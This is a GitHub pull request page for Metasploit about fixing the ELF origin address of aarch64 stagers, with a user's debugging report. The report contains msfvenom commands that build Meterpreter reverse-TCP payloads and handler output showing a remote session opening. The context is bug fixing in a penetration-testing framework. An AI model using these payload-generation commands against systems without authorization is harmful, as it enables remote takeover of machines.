-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
set the org to be 0x400000 #16570
set the org to be 0x400000 #16570
Conversation
Before
After
|
|
To highlight the changes, here is a diff the
And the binary template file
|
Release NotesThis fixes a bug in the generation of aarch 64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process. |
Hi @bwatters-r7 , msf6 exploit(multi/handler) > version
Framework: 6.3.10-dev
Console : 6.3.10-dev # uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux # lscpu
Architecture: aarch64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 4
On-line CPU(s) list: 0-3
Vendor ID: ARM
Model name: Cortex-A72
Model: 3
Thread(s) per core: 1
Core(s) per cluster: 4
Socket(s): -
Cluster(s): 1
Stepping: r0p3
CPU(s) scaling MHz: 67%
CPU max MHz: 1500.0000
CPU min MHz: 600.0000
BogoMIPS: 108.00
Flags: fp asimd evtstrm crc32 cpuid
Caches (sum of all):
L1d: 128 KiB (4 instances)
L1i: 192 KiB (4 instances)
L2: 1 MiB (1 instance)
Vulnerabilities:
Itlb multihit: Not affected
L1tf: Not affected
Mds: Not affected
Meltdown: Not affected
Spec store bypass: Vulnerable
Spectre v1: Mitigation; __user pointer sanitization
Spectre v2: Vulnerable
Srbds: Not affected
Tsx async abort: Not affected Stageless payloads are working fine but staged payloads are failing with an # msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-staged
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 212 bytes
Final size of elf file: 332 bytes
Saved as: aarch64-staged
# file aarch64-staged
aarch64-staged: ELF 64-bit LSB executable, ARM aarch64, invalid version (SYSV), statically linked, no section header
# chmod +x aarch64-staged
# ./aarch64-staged
Illegal instruction msf6 exploit(multi/handler) >
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (949364 bytes) to 192.168.201.10
[-] Meterpreter session 12 is not valid and will be closed
[*] - Meterpreter session 12 closed. # msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-stageless
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 1136368 bytes
Final size of elf file: 1136368 bytes
Saved as: aarch64-stageless
# file aarch64-stageless
aarch64-stageless: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
# chmod +x aarch64-stageless
# ./aarch64-stageless msf6 exploit(multi/handler) >
[*] Meterpreter session 13 opened (192.168.201.10:4444 -> 192.168.201.10:42052) at 2023-05-16 20:43:14 +0000 Interesting observation is that the command |
# readelf -a ./aarch64-staged
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: AArch64
Version: 0x0
Entry point address: 0x400078
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 1
Size of section headers: 0 (bytes)
Number of section headers: 0
Section header string table index: 0 |
try to fix #16562